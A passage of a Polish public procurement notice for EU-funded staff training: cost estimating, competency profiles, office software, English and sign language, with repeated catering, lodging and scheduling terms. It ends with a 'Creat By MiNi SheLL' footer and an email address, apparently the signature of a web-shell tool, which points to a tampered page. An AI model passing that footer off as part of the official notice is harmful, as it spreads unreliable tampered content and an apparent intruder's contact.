10. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
11. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych. 
12. W przypadku szkoleń wyjazdowych Wykonawca zobowiązany jest dodatkowo zapewnić uczestnikom szkolenia transport, 1 nocleg (1 noc) oraz wyżywienie określone w pkt.15 poniżej. Miejsce szkolenia wyjazdowego nie powinno być oddalone od siedziby Zamawiającego o więcej niż 100 km.
12.1. Wykonawca zapewni nocleg w hotelu o standardzie minimum 3-gwiazdkowym wyposażonym w salę szkoleniową odpowiednią dla liczebności danej grupy szkoleniowej. Uczestnicy szkolenia zakwaterowani zostaną w pokojach jedno- bądź dwuosobowych. Zakwaterowanie nastąpić powinno najpóźniej na 30 minut przed rozpoczęciem szkolenia.
12.2. Wyżywienie w ramach szkolenia powinno zostać podane w restauracji znajdującej się nie dalej niż 100m od sali szkoleniowej i bazy noclegowej. Uczestnikom zostaną podane: 
- Pierwszego dnia szkolenia: - obiad i kolacja. 
- Drugiego dnia szkolenia - śniadanie i obiad. 
Śniadanie może być podane w formie bufetu szwedzkiego. 
Obiad musi składać się z przystawki, zupy i dania głównego, soku, deseru, herbaty, kawy. 
Kolacja musi składać się z: dwóch dań podanych na ciepło. Dodatkowo - zestaw wędlin, zestaw serów, zestaw sałatek, pieczywo, masło, soki owocowe, woda mineralna gazowana i niegazowana, kawa  i herbata podana na życzenie, cukier.
12.3. Transport uczestników przypadać musi w dni rozpoczęcia i zakończenia szkolenia. Godziny szkoleniowe powinny uwzględniać czas transportu uczestników do miejsca szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Proces inwestycyjny, kosztorysowanie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Tematy szkoleniowe przedstawione w tabeli Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. 
2. Szkolenie w poz. 4 - Proces inwestycyjny - w tabeli Wykaz szkoleń, jest szkoleniem wyjazdowym. Pozostałe szkolenia odbywać się będą w siedzibie Zamawiającego. 
3. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
4. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń. Poza ww. materiałami szkoleniowymi, szkolenie w Części nr 2 poz.5 tabeli Kosztorysowanie obejmuje także dostarczenie zamawiającemu programu do kosztorysowania wraz z licencją ilości 1 sztuki.  
5. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
6. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
8. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
9. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
10. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
11. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych. 
12. W przypadku szkoleń wyjazdowych Wykonawca zobowiązany jest dodatkowo zapewnić uczestnikom szkolenia transport, 1 nocleg (1 noc) oraz wyżywienie określone w pkt.15 poniżej. Miejsce szkolenia wyjazdowego nie powinno być oddalone od siedziby Zamawiającego o więcej niż 100 km.
12.1. Wykonawca zapewni nocleg w hotelu o standardzie minimum 3-gwiazdkowym wyposażonym w salę szkoleniową odpowiednią dla liczebności danej grupy szkoleniowej. Uczestnicy szkolenia zakwaterowani zostaną w pokojach jedno- bądź dwuosobowych. Zakwaterowanie nastąpić powinno najpóźniej na 30 minut przed rozpoczęciem szkolenia.
12.2. Wyżywienie w ramach szkolenia powinno zostać podane w restauracji znajdującej się nie dalej niż 100m od sali szkoleniowej i bazy noclegowej. Uczestnikom zostaną podane: 
- Pierwszego dnia szkolenia: - obiad i kolacja. 
- Drugiego dnia szkolenia - śniadanie i obiad. 
Śniadanie może być podane w formie bufetu szwedzkiego. 
Obiad musi składać się z przystawki, zupy i dania głównego, soku, deseru, herbaty, kawy. 
Kolacja musi składać się z: dwóch dań podanych na ciepło. Dodatkowo - zestaw wędlin, zestaw serów, zestaw sałatek, pieczywo, masło, soki owocowe, woda mineralna gazowana i niegazowana, kawa  i herbata podana na życzenie, cukier.
12.3. Transport uczestników przypadać musi w dni rozpoczęcia i zakończenia szkolenia. Godziny szkoleniowe powinny uwzględniać czas transportu uczestników do miejsca szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tworzenie matrycy i profili kompetencyjnych, Wdrażanie matrycy i profili kompetencyjnych, Efektywność wdrażania modelu, Komunikacja interpersonalna, Asertywność, Trudne sytuacje w obsłudze klienta, Trwałe budowanie wizerunku klienta, Tworzenie kodeksu etycznego pracowników, Warsztat podsumowujący, Efektywność  wprowadzania kodeku etycznego, Sztuka zarządzania zespołem, Sztuka budowania autorytetu, Sztuka motywowania..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2. Tematy szkoleniowe przedstawione w tabeli  Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. 
2. Szkolenia w poz. 9 - Komunikacja interpersonalna - w tabeli Wykaz szkoleń, stanowiącej załącznik nr 1A do oferty, są szkoleniami wyjazdowymi. Pozostałe szkolenia odbywać się będą w siedzibie Zamawiającego. 
3. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
4. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń. 
5. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
6. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
8. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
9. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
10. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
11. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych. 
12. W przypadku szkoleń wyjazdowych Wykonawca zobowiązany jest dodatkowo zapewnić uczestnikom szkolenia transport, 1 nocleg (1 noc) oraz wyżywienie określone w pkt.15 poniżej. Miejsce szkolenia wyjazdowego nie powinno być oddalone od siedziby Zamawiającego o więcej niż 100 km.
12.1. Wykonawca zapewni nocleg w hotelu o standardzie minimum 3-gwiazdkowym wyposażonym w salę szkoleniową odpowiednią dla liczebności danej grupy szkoleniowej. Uczestnicy szkolenia zakwaterowani zostaną w pokojach jedno- bądź dwuosobowych. Zakwaterowanie nastąpić powinno najpóźniej na 30 minut przed rozpoczęciem szkolenia.
12.2. Wyżywienie w ramach szkolenia powinno zostać podane w restauracji znajdującej się nie dalej niż 100m od sali szkoleniowej i bazy noclegowej. Uczestnikom zostaną podane: 
- Pierwszego dnia szkolenia: - obiad i kolacja. 
- Drugiego dnia szkolenia - śniadanie i obiad. 
Śniadanie może być podane w formie bufetu szwedzkiego. 
Obiad musi składać się z przystawki, zupy i dania głównego, soku, deseru, herbaty, kawy. 
Kolacja musi składać się z: dwóch dań podanych na ciepło. Dodatkowo - zestaw wędlin, zestaw serów, zestaw sałatek, pieczywo, masło, soki owocowe, woda mineralna gazowana i niegazowana, kawa  i herbata podana na życzenie, cukier.
12.3. Transport uczestników przypadać musi w dni rozpoczęcia i zakończenia szkolenia. Godziny szkoleniowe powinny uwzględniać czas transportu uczestników do miejsca szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Obsługa oprogramowania biurowego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Temat szkoleniowy przedstawiony w tabeli Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. 
2. Szkolenia odbywać się będą w siedzibie Zamawiającego. 
3. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
4. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń.  
5. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
6. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
8. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
9. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
10. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
11. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Tworzenie ankiety badającej satysfakcję klientów, Prowadzenie zebrań i spotkań. Moderowanie spotkań z obywatelami, Konsultacje społeczne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Tematy szkoleniowe przedstawione w tabeli Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. 
2. Szkolenia w poz. 21 - Prowadzenie zebrań i spotkań, Moderowanie spotkań z obywatelami - w tabeli Wykaz szkoleń, stanowiącej załącznik nr 1A do oferty, są szkoleniami wyjazdowymi. Pozostałe szkolenia odbywać się będą w siedzibie Zamawiającego. 
3. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
4. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń.   
5. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
6. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
8. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
9. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
10. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
11. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych. 
12. W przypadku szkoleń wyjazdowych Wykonawca zobowiązany jest dodatkowo zapewnić uczestnikom szkolenia transport, 1 nocleg (1 noc) oraz wyżywienie określone w pkt.15 poniżej. Miejsce szkolenia wyjazdowego nie powinno być oddalone od siedziby Zamawiającego o więcej niż 100 km.
12.1. Wykonawca zapewni nocleg w hotelu o standardzie minimum 3-gwiazdkowym wyposażonym w salę szkoleniową odpowiednią dla liczebności danej grupy szkoleniowej. Uczestnicy szkolenia zakwaterowani zostaną w pokojach jedno- bądź dwuosobowych. Zakwaterowanie nastąpić powinno najpóźniej na 30 minut przed rozpoczęciem szkolenia.
12.2. Wyżywienie w ramach szkolenia powinno zostać podane w restauracji znajdującej się nie dalej niż 100m od sali szkoleniowej i bazy noclegowej. Uczestnikom zostaną podane: 
- Pierwszego dnia szkolenia: - obiad i kolacja. 
- Drugiego dnia szkolenia - śniadanie i obiad. 
Śniadanie może być podane w formie bufetu szwedzkiego. 
Obiad musi składać się z przystawki, zupy i dania głównego, soku, deseru, herbaty, kawy. 
Kolacja musi składać się z: dwóch dań podanych na ciepło. Dodatkowo - zestaw wędlin, zestaw serów, zestaw sałatek, pieczywo, masło, soki owocowe, woda mineralna gazowana i niegazowana, kawa  i herbata podana na życzenie, cukier.
12.3. Transport uczestników przypadać musi w dni rozpoczęcia i zakończenia szkolenia. Godziny szkoleniowe powinny uwzględniać czas transportu uczestników do miejsca szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Język angielski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Tematy szkoleniowe przedstawione w tabeli Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. 
2. Szkolenia odbywać się będą w siedzibie Zamawiającego. 
3. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
4. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń.  
5. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
6. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
8. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
9. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
10. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
11. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Język migowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Tematy szkoleniowe przedstawione w tabeli Wykaz szkoleń stanowiącej załącznik nr 1A do oferty. 
2. Szkolenia odbywać się będą w siedzibie Zamawiającego. 
3. Wykonawca zobowiązany jest zapewnić prowadzenie szkoleń przez doświadczonych i kompetentnych trenerów.
4. Wykonawca zapewni uczestnikom przed rozpoczęciem szkolenia materiały szkoleniowe wraz z miejscem na sporządzanie notatek w trakcie szkolenia. Niezależnie od wersji drukowanej, materiały szkoleniowe powinny zostać nagrane na płytę CD i przekazane Zamawiającemu w liczbie odpowiadającej liczbie uczestników szkoleń. 
5. Wraz z materiałami szkoleniowymi Wykonawca zobowiązany jest do przekazania uczestnikom szkolenia ankiety ewaluacyjnej oceniającej przydatność szkolenia.
6. Wszelkie dokumenty i materiały szkoleniowe związane z projektem, powinny zostać oznakowane logo UE, EFS i POKL zgodnie z zasadami informacji i promocji w ramach POKL - wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
7. W dniu podpisania umowy z wykonawcą, Zamawiający udostępni mu dokumentację aplikacyjną projektu wraz z przyjętym planem realizacji szkoleń w podziale na lata 2011-2013.
8. Wykonawca zobowiązany jest do przedstawienia szczegółowego harmonogramu przeprowadzenia szkoleń w terminie 7 dni od dnia podpisania umowy o udzielenie zamówienia. Harmonogram podlegał będzie zatwierdzeniu przez Zamawiającego.
9. Harmonogram szkoleń powinien uwzględniać czas realizacji projektu z uwzględnieniem równomiernego rozłożenia poszczególnych szkoleń. Dni szkoleniowe nie mogą przypadać w soboty, niedziele oraz święta.
10. Osoby trenerów, plan danego szkolenia, materiały szkoleniowe, ankiety ewaluacyjne oraz harmonogram szkoleń podlegają zatwierdzeniu przez Zamawiającego w czasie i na zasadach przedstawionych we wzorze umowy o udzielenie zamówienia (załącznik nr 7 do SIWZ).
11. W każdym dniu szkolenia zostaną zorganizowane dwie przerwy kawowe, w trakcie których podane zostaną: kanapki, kawa, herbata, woda mineralna (gazowana i niegazowana), soki, cukier, mleczko, ciastka kruche. Przerwy kawowe powinny być zorganizowane w budynku w którym odbywa się szkolenie (w tej samej sali lub jej sąsiedztwie). Cena szkolenia ma obejmować: catering, wynagrodzenie trenera i materiałów szkoleniowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com